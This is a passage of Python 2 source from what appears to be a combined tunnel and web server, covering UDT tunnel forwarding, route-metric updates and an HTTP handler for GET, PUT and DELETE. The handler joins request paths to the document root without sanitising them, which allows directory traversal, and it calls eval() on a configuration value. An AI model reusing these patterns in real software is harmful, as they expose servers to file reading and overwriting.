self.socket.close()
def serve_3ws(self):
self.if_reinit_socket()
self.epoll = select.epoll()
self.epoll.register(self.socket.fileno(), select.EPOLLIN)
try:
t = threading.Timer(15, self.check_3ws)
t.start()
while 1:
self.handle_event(self.epoll.poll())
finally:
self.cleanupall()
self.socket.close()
def handle_event_udt_tun(self, index):
try:
while 1:
self.handler.handle_udt_tun_events(self.upolls[index].wait(True, True, -1, True))
except:
if self.upolls[index]:
self.upolls[index] = None
raise
def forward_tun_udt(self, _tun, _usock, _encrypt_mode, _compress, _session): #uuu
_zip = lambda s : eval(_compress).compress(s) if _compress and len(s) < _tun.mtu - 100 else s
_repack = lambda s : ''.join([struct.pack('!H', len(s)), s])
_forward_it=lambda s : _usock.send(_repack(self.handler.encrypt_package(_zip(s), _encrypt_mode, _session))) if _encrypt_mode else _usock.send(_repack(_zip(s)))
try:
while 1:
r = [_tun]; w = []; x = []; _b = None
r, w, x = select.select(r, w, x, 6.0)
if r:
_forward_it(_tun.read(_tun.mtu))
else:
if _tun.fileno() == -1:
#tunnel down
print "Thread forward_tun_udt of tunnel:", _session, "exit.."
break
except:
print "Thread forward_tun_udt of tunnel", _session, "exit.."
raise
def forward_udt_tun(self, _tun, _usock, _encrypt_mode, _compress, _session): #ttt
_magic = {'zlib':(''.join([chr(0x78), chr(0x9c)]), 2), 'lzo':(''.join([chr(0xf0), chr(0x0), chr(0x0)]), 3)}
_unzip = lambda s : eval(_compress).decompress(s) if _compress and _magic[_compress][0] in s[:_magic[_compress][1]] else s
_forward_it = lambda s : _tun.write(_unzip(self.handler.decrypt_package(s, _encrypt_mode, _session))) if _encrypt_mode else _tun.write(_unzip(s))
try:
while 1:
_forward_it(_usock.recv(struct.unpack('!H', _usock.recv(2))[0]))
except IOError as e:
if e.errno == errno.EINVAL:
#illegal data, maybe tunnel peer shutdown suddenly
_usock.close()
print "Thread forward_udt_tun of tunnel", _session, "exit.."
raise
except:
print "Thread forward_udt_tun of tunnel", _session, "exit.."
raise
def forward_udt_relay(self, _usock, _session):
_repack = lambda s : ''.join([struct.pack('!H', len(s)), s])
try:
_from, _to = self.handler.udt_relay[_session]
_relay_session = None
_first = True
while not _relay_session:
if _session == _from:
self.handler.udt_relay_thread_stat[_from] = True
_relay_session = self.zsess.get(_to, None)
else:
self.handler.udt_relay_thread_stat[_to] = True
_relay_session = self.zsess.get(_from, None)
if _first:
_first = False
else:
time.sleep(5)
else:
_to_usock = _relay_session[1]
while 1:
_to_usock.send(_repack(_usock.recv(struct.unpack('!H', _usock.recv(2))[0])))
except:
if _session == _from:
self.handler.udt_relay_thread_stat[_from] = False
else:
self.handler.udt_relay_thread_stat[_to] = False
print "Thread forward_udt_relay of tunnel", _session, "exit.."
raise
def check_3wd(self): #333
try:
while 1:
time.sleep(20)
_tun, _usock, _addr = [None, None, None]
if (self.handler.wdd_mode == 'client' or self.handler.wdd_mode == 'hybird'):
_idx = -1
for _session in self.handler.wdd_dial:
_idx += 1
if self.workers > 1 and (_idx % self.workers) + 1 != self._worker_id:
continue
if _session in self.handler.client_session:
_redial = False
_tun, _usock, _addr = self.zsess.get(_session, (None, None, None))
if _usock:
#{INIT = 1, OPENED, LISTENING, CONNECTING, CONNECTED, BROKEN, CLOSING, CLOSED, NONEXIST}
if _usock.getsockstate() > 5: #connection gone
self.handler.destroy_tunnel(_session)
_redial = True
else:
self.handler.tun_rtt[_session]= _usock.perfmon().msRTT
else:
#must connect failed before
_redial = True
if _redial:
t = threading.Thread(target=self.handler.connect_udt_server, args=(_session,))
t.daemon = True
t.start()
if self.handler.wdd_mode == 'server' or self.handler.wdd_mode == 'hybird':
for _session in self.handler.connected.keys():
if _session not in self.handler.wdd_dial or _session not in self.handler.client_session:
#server connection
_tun, _usock, _addr = self.zsess.get(_session, (None, None, None))
if _usock:
if _usock.getsockstate() > 5: #connection gone
self.handler.destroy_tunnel(_session)
else:
self.handler.tun_rtt[_session]= _usock.perfmon().msRTT
if os.path.exists('/tmp/usock_stat'):
udt4.dump_perfmon(_usock.perfmon())
if self.workers > 1:
self.wdd_idle_worker(9000)
for _session in self.handler.udt_relay:
if _session in self.handler.udt_relay_thread_stat and not self.handler.udt_relay_thread_stat[_session]:
#relaunch the udt relay thread, due to one side may be downed before
_tun, _usock, _addr = self.zsess.get(_session, (None, None, None))
if _usock:
print "Re-launching relay tunnel", _session
if self.handler.io_mode == self.handler.IO_NONBLOCK:
_n = _usock.UDTSOCKET.UDTSOCKET % self.udt_thread_limit
if self.upolls[_n] is None:
self.upolls[_n] = udt.Epoll()
self.upolls[_n].add_usock(_usock, udt4.UDT_EPOLL_IN)
t = threading.Thread(target=self.handle_event_udt_tun, args=(_n,))
t.daemon = True
t.start()
else:
self.upolls[_n].add_usock(_usock, udt4.UDT_EPOLL_IN)
self.handler.udt_relay_thread_stat[_session] = True
else:
t = threading.Thread(target=self.forward_udt_relay,args=(_usock,_session,))
t.daemon = True
t.start()
if self.handler.routing_metric:
with open(os.devnull, 'w') as devnull:
for _route in self.handler.route_metric:
if len(self.handler.route_metric[_route]) > 1:
_target_session = None
_target_session_rtt = -1
_fixed_metric = 0 #0 for dynamic, >0 for fixed
for _session in self.handler.route_metric[_route]:
if _route in self.handler.route_metric_fixed:
if _session in self.handler.route_metric_fixed[_route]:
_fixed_metric = self.handler.route_metric_fixed[_route][_session]
else:
_fixed_metric = 0
if _session in self.handler.tun_rtt:
_rtt_old=self.handler.route_metric[_route][_session]
_rtt = self.handler.route_metric[_route][_session] = int(self.handler.tun_rtt[_session] * 10)
if _rtt == 0:
_rtt = self.handler.route_metric[_route][_session] = 1
if _target_session_rtt == -1:
if _fixed_metric > 0:
_target_session_rtt = _fixed_metric
else:
_target_session_rtt = _rtt
_target_session = _session
else:
if _fixed_metric > 0:
if _target_session_rtt > _fixed_metric:
_target_session_rtt = _fixed_metric
_target_session = _session
elif _target_session_rtt > _rtt:
_target_session_rtt = _rtt
_target_session = _session
subprocess.call(['ip', 'route', 'del', _route, 'metric', str(_rtt_old), 'dev', ''.join([_session, '.', str(self._worker_id)])], stderr=devnull)
subprocess.call(['ip', 'route', 'add', _route, 'metric', str(_rtt), 'dev', ''.join([_session, '.', str(self._worker_id)])], stderr=devnull)
if _target_session:
#change the default outgoing path(dev) for a route
subprocess.call(['ip', 'route', 'replace', _route, 'metric', str('0'), 'dev', ''.join([_target_session, '.', str(self._worker_id)])], stderr=devnull)
_rtch_script = self.handler.rtch_script.get(_target_session, None)
if _rtch_script:
subprocess.call([_rtch_script, ''.join([_target_session, '.', str(self._worker_id)])], stderr=devnull)
else:
#only one path, no need to change
continue
del _tun
del _usock
del _addr
self.o_mem()
except:
raise
def wdd_idle_worker(self, port): #iii
conns = -1
worker_id = -1
#assume that more than 1 worker
for _worker_id, _conns in self.udt_conns_cnt.items():
if _worker_id == 0: continue
if conns == -1:
conns = _conns.value
worker_id = _worker_id
else:
if conns > _conns.value:
#locate the least connection worker
conns = _conns.value
worker_id = _worker_id
if self.udt_conns_cnt[port - Port + 1].value > conns:
#orig worker has more conns than the least one, redirect to new worker
#print "to new server", conns, worker_id
self.udt_conn_port.value = worker_id + Port -1
else:
#no need to redirect
#print "keep server", conns, worker_id
self.udt_conn_port.value = port
return self.udt_conn_port.value
class _xHandler:
http_version_11 = "HTTP/1.1"
http_version_10 = "HTTP/1.0"
HTTP11 = 1
HTTP10 = 0
HTTP_OK = 200
HTTP_NOT_MODIFIED = 304
HTTP_BAD_REQUEST = 400
HTTP_FORBITDDEN = 403
HTTP_NOT_FOUND = 404
HTTP_SERVER_ERROR = 500
HTTP_SERVER_RESET = 502
HTTP_SERVER_BUSY = 503
HTTP_SERVER_TIMEOUT = 504
PARSE_OK = 0
PARSE_ERROR = -1
PARSE_AGAIN = 1
PARSE_MORE = 2
PARSE_MORE2 = 3
EOL1 = b'\n\n'
EOL2 = b'\n\r\n'
xR_OK = 0
xR_PARSE_AGAIN = 1
xR_ERR_PARSE = -1
xR_ERR_HANDLE = -2
xR_ERR_403 = -3
xR_ERR_404 = -4
xR_ERR_5xx = -5
xResult = 0
weekdayname = ['Mon', 'Tue', 'Wed', 'Thu', 'Fri', 'Sat', 'Sun']
monthname = [None, 'Jan', 'Feb', 'Mar', 'Apr', 'May', 'Jun',
'Jul', 'Aug', 'Sep', 'Oct', 'Nov', 'Dec']
index_files = ["index.html", "index.htm"]
gzip_types = []
gzip_types_default = ["html", "htm", "js", "css", "txt", "xml"]
mimetype = {'html': 'text/html', 'htm': 'text/html', 'txt': 'text/plain',
'css': 'text/css', 'xml': 'text/xml', 'js': 'application/x-javascript',
'png': 'image/png', 'jpg': 'image/jpeg', 'gif': 'image/gif', 'bin': 'application/octet-stream'}
web_config = None
web_config_parsed = False
_r = b'' #request headers
xcache_ttl = 5 #normally, 5-10 seconds internal cache time of items
xcache_size = 1000000 #1 million items, about 1/3GB(333MB) mem used
x_shelf_size = 1000000 #1 million items in disk, about 30GB disk size with average item size 30KB
gzip_on = False
gzip_size = 1000 #default >1KB file size can be gzipped
gzip_max_size = 10000000 #default <=10MB file size can be gzipped
multip = {'k':1000, 'K':1000, 'm':1000000, 'M':1000000, 'g':1000000000, 'G':1000000000}
writers = []
multis = {'s':1, 'm':60, 'h':3600, 'd':86400, 'w':604800, 'y':31536000}
expire_types = {}
def __init__(self, conn, client_address, server, native_epoll=True,
gevent_stream=False, recv_buf_size=16384, send_buf_size=65536, pipelining=False):
self.server = server
self._native_epoll = native_epoll
self._gevent_stream = gevent_stream
if native_epoll:
self.recv_buf_size = self.server.recv_buf_size
self.send_buf_size = self.server.send_buf_size
else:
self.recv_buf_size = recv_buf_size
self.send_buf_size = send_buf_size
self.server_version = ''.join([_Name, '/', __version__])
self.server_pipelining = pipelining
self.in_headers = {}
self.out_headers = {}
self.homedir = Homedir
self.init_config()
self.init_handler(conn, client_address)
if self._gevent_stream:
sendfile.sendfile = gevent_sendfile
self.handle_request()
self.clean()
def init_config(self):
if not self.web_config_parsed:
try:
self.web_config = ConfigParser.ConfigParser()
if not self.web_config.read('3xsd.conf'):
self.web_config.read('/etc/3xsd.conf')
for name, value in self.web_config.items('3wsd'):
if name == 'root':
if value:
self.homedir = value
elif name == 'index':
self.index_files = []
for item in value.split(','):
if item:
self.index_files.append(item)
if not self.index_files:
self.index_files = ["index.html", "index.htm"]
elif name == 'mime_types':
for item in value.split(','):
if item:
k, v = item.split(':', 1)
if k and v:
self.mimetype[k] = v
elif name == 'gzip':
if value.lower() == "on":
self.gzip_on = True
if not self.server.gzip_shelf:
self.server.gzip_shelf = shelve.open('shelf.gzip', writeback=True)
if not self.server.gzip_shelf_lock:
self.server.gzip_shelf_lock = multiprocessing.Lock()
elif name == 'gzip_size':
if value[-1] in ['k','m','g','K','M','G']:
_multip = self.multip[value[-1]]
self.gzip_size = int(value[:-1])*_multip
else:
self.gzip_size = int(value)
elif name == 'gzip_max_size':
if value[-1] in ['k','m','g','K','M','G']:
_multip = self.multip[value[-1]]
self.gzip_max_size = int(value[:-1])*_multip
else:
self.gzip_max_size = int(value)
elif name == 'gzip_types':
self.gzip_types = copy.copy(self.gzip_types_default)
for item in value.split(','):
if item:
if item not in self.gzip_types:
if item[0] == '-':
self.gzip_types.remove(item[1:])
else:
self.gzip_types.append(item)
elif name == 'writers':
self.writers = []
if value:
a = value.split(',')
for item in a:
if item.find('-') < 0:
self.writers.append(item)
else:
_ip = item.split('.')
_last = _ip[3].split('-')
for i in range(int(_last[0]), int(_last[1])+1):
ip = '.'.join([_ip[0], _ip[1], _ip[2], str(i)])
self.writers.append(ip)
elif name == 'xcache_ttl':
self.xcache_ttl = int(value)
elif name == 'server_pipelining':
if value.lower() == "on":
self.server_pipelining = True
elif name == 'expire_types':
self.expire_types = {}
for item in value.split(','):
if item:
k, v = item.split(':', 1)
if k and v:
if v[-1] in ['s','m','h','d','w','y']:
_multis = self.multis[v[-1]]
self.expire_types[k] = int(v[:-1])*_multis
else:
self.expire_types[k] = int(v)
except:
raise
web_config_parsed = True
def init_handler(self, conn, client_address, rw_mode=0):
self.addr = client_address
self.sock = conn
if self.sock:
self.sock_fileno = conn.fileno()
self.out_body_file = self.out_body_mmap = self._c = self.accept_encoding = None
self.out_body_size = self.out_body_file_lmt = self.cmd_get = self.cmd_head = self.cmd_put = self.cmd_delete = self.if_modified_since = self.keep_connection = self.xResult = 0
self.has_resp_body = self.xcache_hit = False
self.canbe_gzipped = self.gzip_transfer = self.gzip_chunked = False
self.gzip_finished = self.next_request = True
#self.vhost_mode = False
self.transfer_completed = 1
self.command = self.path = self.resp_line = self.resp_msg = self.out_head_s = self._r = self._rb = self.hostname = self.xcache_key = b''
self.c_http_ver = self.s_http_ver = self.r_http_ver = 1
self.resp_code = self.HTTP_OK
self.resume_transfer = rw_mode
def __call__(self, fds):
#should be called by native epoll server, can handle multi requests at one handler call, like: do 10 read events at a time with 10 connections
for f, rw_mode in fds: #ccc
if rw_mode == 0:
self.init_handler(self.server.conns[f], self.server.addrs[f], rw_mode)
parse_stat = self.x_parse()
if parse_stat == self.PARSE_OK or parse_stat == self.PARSE_MORE2:
if self.cmd_get == 1 or self.cmd_head == 1:
self.x_GET()
self.x_response()
elif self.cmd_put == 1 or self.cmd_delete == 1:
self.x_PUT()
self.x_response()
else:
self.xResult = self.xR_ERR_HANDLE
elif self.server_pipelining and parse_stat == self.PARSE_MORE:
if self.cmd_get == 1 or self.cmd_head == 1:
self.x_GET()
self.x_response()
elif self.cmd_put == 1 or self.cmd_delete == 1:
self.x_PUT()
self.x_response()
else:
self.xResult = self.xR_ERR_HANDLE
self.server.epoll.modify(f, select.EPOLLIN|select.EPOLLOUT)
elif parse_stat == self.PARSE_AGAIN:
self.xResult = self.xR_PARSE_AGAIN
continue
else:
self.xResult = self.xR_ERR_PARSE
elif rw_mode == 1:
#continue sending a large file or pipeling
if f in self.server.resume:
#large file transfering
self.init_handler(self.server.conns[f], self.server.addrs[f], rw_mode)
self.x_response()
elif self.server_pipelining and f in self.server.x_reqs:
if self.server.x_reqs[f][1] == 1:
#add pipelining request
fds.append((f, 0))
else:
#maybe large PUT request recving
try:
self.server.epoll.modify(f, select.EPOLLIN)
except:
pass
self.keep_connection = 1
elif self.server_pipelining and f not in self.server.x_reqs:
self.transfer_completed = 0 #not do clean()
try:
self.server.epoll.modify(f, select.EPOLLIN)
except:
pass
else:
self.xResult = self.xR_ERR_PARSE
else:
self.xResult = self.xR_ERR_PARSE
self.clean()
def check_connection(self, c_http_ver, check_ims=True, gen_xcache_key=True):
if c_http_ver == "HTTP/1.1":
self.c_http_ver = 1
if self.s_http_ver == self.HTTP11:
self.r_http_ver = 1
else:
self.r_http_ver = 0
else:
self.c_http_ver = 0
self.r_http_ver = 0
if self.in_headers.get("Connection", "null").lower() == "keep-alive":
self.keep_connection = 1
#self.r_http_ver = 1
else:
self.keep_connection = 0
if self.server.zlb_mode:
if gen_xcache_key:
self.hostname = self.in_headers.get("Host", "127.0.0.1").split(':',1)[0]
self.xcache_key = ''.join([self.hostname, self.path])
else:
self.xcache_key = self.path
if check_ims:
if self.in_headers.get("If-Modified-Since"):
self.if_modified_since = 1
else:
self.if_modified_since = 0
def date_time_string(self, ts=None):
if ts is None: ts = time.time()
year, month, day, hh, mm, ss, wd, y, z = time.gmtime(ts)
s = "%s, %02d %3s %4d %02d:%02d:%02d GMT" % (
self.weekdayname[wd],
day, self.monthname[month], year,
hh, mm, ss)
return s
def set_out_header(self, key, value):
self.out_headers[key] = value
def set_resp_code(self, code):
if self.r_http_ver == self.HTTP11:
prefix = "HTTP/1.1"
else:
prefix = "HTTP/1.0"
self.has_resp_body = False
self.resp_code = code
if code == 200:
self.resp_msg = "OK"
self.has_resp_body = True
elif code == 201:
self.resp_msg = "Created"
elif code == 204:
self.resp_msg = "No Content"
elif code == 301:
self.resp_msg = "Move Permanent"
elif code == 302:
self.resp_msg = "Move Temporary"
elif code == 304:
self.resp_msg = "Not Modified"
elif code == 404:
self.resp_msg = "Not Found"
elif code == 403:
self.resp_msg = "Forbidden"
elif code == 500:
self.resp_msg = "Server Error"
elif code == 502:
self.resp_msg = "Server Reset"
elif code == 503:
self.resp_msg = "Service Unavailable"
elif code == 504:
self.resp_msg = "Server Timeout"
self.resp_line = ''.join([prefix, ' ', str(code), ' ', self.resp_msg])
def handle_request(self):
#called when running at gevent mode
while self.next_request:
if self.x_parse() == self.PARSE_OK:
if self.cmd_get == 1 or self.cmd_head == 1:
self.x_GET()
else:
return
self.x_response()
else:
self.xResult = self.xR_ERR_PARSE
self.next_request = False
if self.keep_connection == 0:
self.next_request = False
def x_parse(self):
#get the request headers, xxx
_doing_pipelining = _last_pipelining = _header_parsed = False
_eol_pos = -1
_cl = 0
_fn = self.sock_fileno
if _fn not in self.server.x_reqs:
r = self._r
_xreqs_empty = _first_pipelining = True
else:
r = self._r = self.server.x_reqs[_fn][0]
_xreqs_empty = _first_pipelining = False
if self.EOL2 in r or self.EOL1 in r:
if self.server.x_reqs[_fn][1] < 0:
#request body not finished recv, PUT method
_header_parsed = True
_first_pipelining = True
_cl = 0 - self.server.x_reqs[_fn][1]
_eol_pos = self.server.x_reqs[_fn][2]
elif self.server.x_reqs[_fn][1] == 0:
#not pipelining requests, must done before
self.server.x_reqs.pop(_fn)
r = self._r = b''
else:
#self.server.x_reqs[_fn][1] == 1
_doing_pipelining = True
while 1:
try:
if not _doing_pipelining:
b = self.sock.recv(self.recv_buf_size)
if b:
r = self._r = ''.join([r, b])
else:
#peer closed connection?
return self.PARSE_ERROR
if not _header_parsed:
_eol_pos = r.find(self.EOL2)
if _eol_pos > -1 and not _header_parsed:
#headers mostly end with EOL2 "\n\r\n"
if not self.server_pipelining:
if not _xreqs_empty:
#a big-headers request is all recieved
self.server.x_reqs.pop(_fn, None)
else:
#for http pipelining
if r.count(self.EOL2) > 1 or _eol_pos < len(r) - len(self.EOL2):
c = r.split(self.EOL2, 1)
r = c[0]
self.server.x_reqs[_fn] = [c[1], 1]
_doing_pipelining = True
else:
if not _xreqs_empty:
#doing the last pipelining, clear x_reqs
self.server.x_reqs.pop(_fn, None)
_last_pipelining = True
break
elif _eol_pos > -1 and _header_parsed:
#recving request body
self._rb = r[_eol_pos+len(self.EOL2):]
if _cl > len(self._rb):
#not finished recv request body
self.server.x_reqs[_fn] = [r, 0 - _cl, _eol_pos]
return self.PARSE_AGAIN
elif _cl < len(self._rb):
#full request body recv, there are other data, maybe pipelining requests
self.server.x_reqs[_fn] = [self._rb[_cl:], 1]
_doing_pipelining = True
break
else:
#whole body recv done
self.server.x_reqs.pop(_fn , None)
#vars should been re-setup, though header parsed before
break
else:
#not finished all headers, save recv data
self.server.x_reqs[_fn] = [r, 0]
return self.PARSE_AGAIN
#self.sock.setblocking(0)
except socket.error as e:
if e.errno == errno.EAGAIN:
#no more request data, see if the whole request headers should be recieved
if self.EOL2 in r or self.EOL1 in r:
break
else:
#keeping connection, no request has been sent..
#self.sock.setblocking(1)
return self.PARSE_AGAIN
else:
#peer closed connection?
return self.PARSE_ERROR
#a = r.split("\r\n", 1)
a = r[:_eol_pos].splitlines()
#if not a[0]:
if len(a) < 2:
#illeagal request headers
return self.PARSE_ERROR
try:
#"GET / HTTP/1.1"
self.command, self.path, _c_http_ver = a[0].split()
except:
#illeagal command/path line
return self.PARSE_ERROR
if self.command == 'GET':
self.cmd_get = 1
elif self.command == 'HEAD':
self.cmd_head = 1
elif self.command == 'PUT':
self.cmd_put = 1
elif self.command == 'DELETE':
self.cmd_delete = 1
else:
return self.PARSE_ERROR
"""
#all headers go to dict
if self.cmd_put == 0:
self.in_headers = dict((k, v) for k, v in (item.split(": ") for item in a[1].strip().split("\r\n")))
else:
self.in_headers = dict((k, v) for k, v in (item.split(": ") for item in a[1].split(self.EOL2, 1)[0].split("\r\n")))
"""
for _line in a[1:]:
_pos = _line.find(": ")
if _pos > 0:
self.in_headers[_line[:_pos]] = _line[_pos+2:]
self.check_connection(_c_http_ver)
if self.cmd_put == 1 and not _header_parsed:
if _eol_pos < len(r) - len(self.EOL2):
self._rb = r[_eol_pos+len(self.EOL2):] #request body
else:
self._rb = b''
_cl = int(self.in_headers.get("Content-Length", "0"))
if _cl == 0:
return self.PARSE_ERROR
elif _cl > len(self._rb):
#not finished recv request body
self.server.x_reqs[_fn] = [r, 0 - _cl, _eol_pos]
return self.PARSE_AGAIN
elif _cl < len(self._rb):
#full request body recv, there are other data, maybe pipelining requests
self.server.x_reqs[_fn] = [self._rb[_cl:], 1]
_doing_pipelining = True
else:
#full request body recv
self.server.x_reqs.pop(_fn, None)
if _fn not in self.server.x_reqs:
#no more requests to process, last pipelining or non-pipelining
return self.PARSE_OK
else:
if self.server.x_reqs[_fn][1] == 1:
#doing pipelining, not last
if _first_pipelining:
#first piplining
return self.PARSE_MORE
else:
#not first piplining
return self.PARSE_MORE2
def x_GET(self):
if self.if_modified_since == 0 and self.xcache_key in self.server.xcache:
self._c = self.server.xcache.get(self.xcache_key)
ttl = self._c[0]
if ttl >= time.time():
#cache hit
self.out_head_s, self.out_body_file, self.out_body_size, self.out_body_file_lmt, self.out_body_mmap, self.canbe_gzipped = self._c[1:]
self.has_resp_body = True
if self.r_http_ver == self.HTTP11:
self.resp_line = 'HTTP/1.1 200 OK'
else:
self.resp_line = 'HTTP/1.0 200 OK'
if self.canbe_gzipped and self.c_http_ver == self.HTTP11 and self.r_http_ver == self.HTTP11:
for x in self.in_headers.get("Accept-Encoding", "null").replace(' ','').split(','):
if x == "gzip":
self.gzip_transfer = True
break
if self.gzip_transfer:
if self.xcache_key in self.server.gzip_shelf:
if self.server.gzip_shelf[self.xcache_key][4]==self.out_body_file_lmt:
self.out_head_s=self.server.gzip_shelf[self.xcache_key][1]
self.out_body_file=self.server.gzip_shelf[self.xcache_key][2]
self.out_body_size=self.server.gzip_shelf[self.xcache_key][3]
self.gzip_chunked=self.server.gzip_shelf[self.xcache_key][7]
self.xcache_hit = True
return
else:
self.xcache_hit = False
else:
self.xcache_hit = False
else:
self.xcache_hit = True
return
else:
self.xcache_hit = True
return
else:
#cache item expired
if isinstance(self._c[2], file) and not self._c[2].closed: #close the file opened, if not closed
self._c[2].close()
if self._c[5]: #close the mmap maped, if exists
self._c[5].close()
self._c = None
self.server.xcache.pop(self.xcache_key)
self.xcache_hit = False
#cache miss or if_modified_since request
"""
if self.vhost_mode:
path = ''.join([self.homedir, '/', self.hostname, self.path])
else:
path = ''.join([self.homedir, self.path])
"""
path = ''.join([self.homedir, self.path])
if os.path.isdir(path):
if not path.endswith('/'):
self.set_resp_code(301)
self.set_out_header("Location", ''.join([path, "/"]))
return
for index in self.index_files:
index = os.path.join(path, index)
if os.path.exists(index):
path = index
break
try:
f = open(path, 'rb')
self.out_body_file = f
except IOError as e:
if e.errno == errno.EISDIR:
self.set_resp_code(403)
else:
self.set_resp_code(404)
return
try:
fs = os.fstat(f.fileno())
#Last Modified time
self.out_body_file_lmt = fs.st_mtime
lmt = self.date_time_string(fs.st_mtime)
lms = self.in_headers.get("If-Modified-Since")
if lmt == lms:
self.set_resp_code(304)
return
else:
self.set_out_header("Last-Modified", lmt)
self.out_body_size = fs[6]
self.set_out_header("Content-Length", str(fs[6]))
except:
self.set_resp_code(404)
f.close()
return
try:
a = path.rsplit('.')
content_type = self.mimetype.get(a[1])
if content_type:
self.set_out_header("Content-Type", content_type)
if self.gzip_on and a[1] in self.gzip_types and self.out_body_size > self.gzip_size and self.out_body_size <= self.gzip_max_size:
self.canbe_gzipped = True
else:
self.set_out_header("Content-Type", "application/octet-stream")
if a[1] in self.expire_types:
self.set_out_header("Cache-Control", ''.join(["max-age=", str(self.expire_types[a[1]])]))
self.set_out_header("Expires", self.date_time_string(time.time() + self.expire_types[a[1]]))
except:
self.set_out_header("Content-Type", "application/octet-stream")
self.set_resp_code(200)
def x_PUT(self):
try:
_peer_ip, _port = self.sock.getpeername()
except:
_peer_ip = b''
if _peer_ip not in self.writers:
self.xResult = self.xR_ERR_HANDLE
return
path = ''.join([self.homedir, self.path])
if not os.path.isdir(path):
if self.cmd_delete == 1:
if os.path.exists(path):
try:
os.unlink(path)
self.set_resp_code(204)
except:
self.set_resp_code(403)
else:
self.set_resp_code(204)
elif self.cmd_put == 1:
try:
_dir = path.rsplit('/', 1)[0]
if not os.path.exists(_dir):
os.makedirs(_dir, 0755)
f = open(path, 'wb')
f.write(self._rb)
f.close()
self.set_resp_code(201)
except IOError as e:
self.set_resp_code(403)
else:
if self.cmd_delete == 1:
try:
os.rmdir(path)
self.set_resp_code(204)
except:
self.set_resp_code(403)
else:
self.set_resp_code(403)
def send_out_all_headers(self, extra=''):
#if self.keep_connection == 1 and self.r_http_ver == self.HTTP11:
if self.keep_connection == 1:
self.sock.send(''.join([self.resp_line, "\n", self.out_head_s, "Connection: keep-alive\n\n", extra]))
#writev(self.sock_fileno, [self.resp_line, "\n", self.out_head_s, "Connection: keep-alive\n\n", extra])
else:
self.sock.send(''.join([self.resp_line, "\n", self.out_head_s, "Connection: close\n\n", extra]))
#writev(self.sock_fileno, [self.resp_line, "\n", self.out_head_s, "Connection: close\n\n", extra])
def send_out_all_headers2(self, extra=None):
if extra:
#if self.keep_connection == 1 and self.r_http_ver == self.HTTP11:
if self.keep_connection == 1:
self.sock.send(''.join([self.resp_line, "\n", self.out_head_s, "Connection: keep-alive\n\n", extra]))
else:
self.sock.send(''.join([self.resp_line, "\n", self.out_head_s, "Connection: close\n\n", extra]))
else:
#if self.keep_connection == 1 and self.r_http_ver == self.HTTP11:
if self.keep_connection == 1:
self.sock.send(''.join([self.resp_line, "\n", self.out_head_s, "Connection: keep-alive\n\n"]))
else:
self.sock.send(''.join([self.resp_line, "\n", self.out_head_s, "Connection: close\n\n"]))
def x_response(self):
if self.resume_transfer == 0:
sent = _sent = 0
elif self.resume_transfer == 1:
self.xcache_hit = self.has_resp_body = True
self.command = 'GET'
self.cmd_get = 1
_sent = 0
self.transfer_completed = 0
_rs = self.server.resume.get(self.sock_fileno)
if _rs:
self.out_body_file, self.out_body_size, sent, self.keep_connection, self.gzip_transfer, self.xcache_key = _rs
if self.gzip_transfer:
_org_file = self.server.xcache[self.xcache_key][2]
_org_size = self.server.xcache[self.xcache_key][3]
self.out_head_s = self.server.gzip_shelf[self.xcache_key][1]
self.out_body_file = self.server.gzip_shelf[self.xcache_key][2]
self.out_body_size = self.server.gzip_shelf[self.xcache_key][3]
_file_lmt = self.server.gzip_shelf[self.xcache_key][4]
_gzip_pos = self.server.gzip_shelf[self.xcache_key][5]
self.gzip_finished = self.server.gzip_shelf[self.xcache_key][6]
self.gzip_chunked = self.server.gzip_shelf[self.xcache_key][7]
else:
#no such resume, must be first trans
self.server.epoll.modify(self.sock_fileno, select.EPOLLIN)
self.resume_transfer = sent = 0
self.out_head_s = self.server.xcache[self.xcache_key][1]
self.out_body_file = self.server.xcache[self.xcache_key][2]
self.out_body_size = self.server.xcache[self.xcache_key][3]
#At this point, begin transfer response, first to roll out headers
if not self.xcache_hit:
_t = time.time()
if len(self.out_headers) > 0:
self.out_head_s = ''.join(["Server: ", self.server_version, "\nDate: ", self.date_time_string(_t), '\n', '\n'.join(['%s: %s' % (k, v) for k, v in self.out_headers.items()]), '\n'])
else:
self.out_head_s = ''.join(["Server: ", self.server_version, "\nDate: ", self.date_time_string(_t), '\n'])
if self.resp_code == self.HTTP_OK and self.out_body_size > 0:
#Only 200 and body_size > 0 response will be cached, [ttl, out_head_s, f, fsize, f_lmt, mmap], and file smaller than 1KB will be mmaped
if self.out_body_size < 1000 and not self.canbe_gzipped:
self.out_body_mmap = mmap.mmap(self.out_body_file.fileno(), 0, prot=mmap.PROT_READ)
else:
if self.canbe_gzipped and self.c_http_ver == self.HTTP11 and self.r_http_ver == self.HTTP11:
for x in self.in_headers.get("Accept-Encoding", "null").replace(' ','').split(','):
if x == "gzip":
self.gzip_transfer = True
break
if self.gzip_transfer:
#generate gzip cache item
try:
#gzip it
_gzf = zlib.compressobj(6,
zlib.DEFLATED,
zlib.MAX_WBITS | 16,
zlib.DEF_MEM_LEVEL,
0)
self.out_body_file.seek(0)
if self.out_body_size > self.send_buf_size/2:
self.gzip_chunked = True
_ss = _gzf.compress(self.out_body_file.read(self.send_buf_size/2))
_ss = ''.join([_ss, _gzf.flush(zlib.Z_SYNC_FLUSH)])
else:
_ss = _gzf.compress(self.out_body_file.read(self.out_body_size))
_ss = ''.join([_ss, _gzf.flush(zlib.Z_FINISH)])
_out_headers = copy.copy(self.out_headers)
_out_headers["Content-Encoding"] = "gzip"
if self.gzip_chunked:
_out_headers["Transfer-Encoding"] = "chunked"
try:
del _out_headers["Content-Length"]
except:
pass
else:
_out_headers["Content-Length"] = len(_ss)
_out_head_s = ''.join([self.resp_line, "\nServer: ", self.server_version, "\nDate: ", self.date_time_string(_t), '\n', '\n'.join(['%s: %s' % (k, v) for k, v in _out_headers.items()]), '\n'])
#moved to self.server.check_3ws()
#keep the mem cache of gzip_shelf limitted
#while len(self.server.gzip_shelf.cache) > 1000:
# self.server.gzip_shelf.cache.popitem()
#keep the disk cache of gzip_shelf limitted
if len(self.server.gzip_shelf) > self.x_shelf_size:
with self.server.gzip_shelf_lock:
self.server.gzip_shelf.popitem()
if self.gzip_chunked:
#[file size original, headers, content, body_size, file modified time, current gzip position, finished, chunked]
_sss = ''.join([hex(len(_ss))[2:], '\r\n', _ss, '\r\n'])
with self.server.gzip_shelf_lock:
self.server.gzip_shelf[self.xcache_key] = [self.out_body_size, _out_head_s, _sss, len(_sss), self.out_body_file_lmt, self.send_buf_size/2, False, self.gzip_chunked]
self.server._gzs[self.xcache_key] = _gzf
else:
with self.server.gzip_shelf_lock:
